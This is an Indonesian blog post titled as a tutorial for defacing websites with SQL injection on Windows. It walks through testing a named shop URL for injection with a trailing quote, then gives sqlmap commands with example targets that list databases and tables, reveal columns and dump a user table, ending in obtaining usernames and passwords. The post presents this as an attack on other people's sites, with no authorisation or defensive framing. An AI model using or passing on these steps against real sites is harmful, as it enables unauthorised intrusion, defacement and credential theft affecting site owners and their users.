Blogroll

Selasa, 17 September 2013

[Tutorial] Deface Dengan SQL Injection Di Windows

Hello Brothers Ketemu Saya Lagi GALAUERS DOT ID A.K.A GwGanteng007
Kali Ini Saya Akan bahas tentang Tutorial Deface Dengan "SQL INJECTION DI OS WINDOWS"
Mulai TUTORIALnya Ya Brothers ^^


Alat Tempur :
- Python [ http://www.python.org/download/ ]
- sqlmap [ http://www.galauers-dot-id.tk/sqlmap/sqlmap.rar ]

Ok Mulai Tutorialnya :


Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi

    http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"


sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :

    cd\sqlmap\ , maka hasilnya akan seperti ini :





2. Stelah itu, kalian mulailah scan website target dengan perintah :

    sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]





3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :

    sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :





4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :

    sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :





5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :

    sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump

Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :

    do you want to crack them via a dictionary-based attack? [Y/n/q] 

Maka Hasilnya akan seperti ini :





nah itu kita dapetin User + Passwordnya :D

Sumber:


http://indocyberarmy.blogspot.com


















Thread By





di


























Tidak ada komentar:















Posting Komentar




















        

      















Cari Blog Ini




































































Copyright © 2012 All About Share | Sword Art Online Theme| Powered by Blogger | Designed by Yoshua Marchiano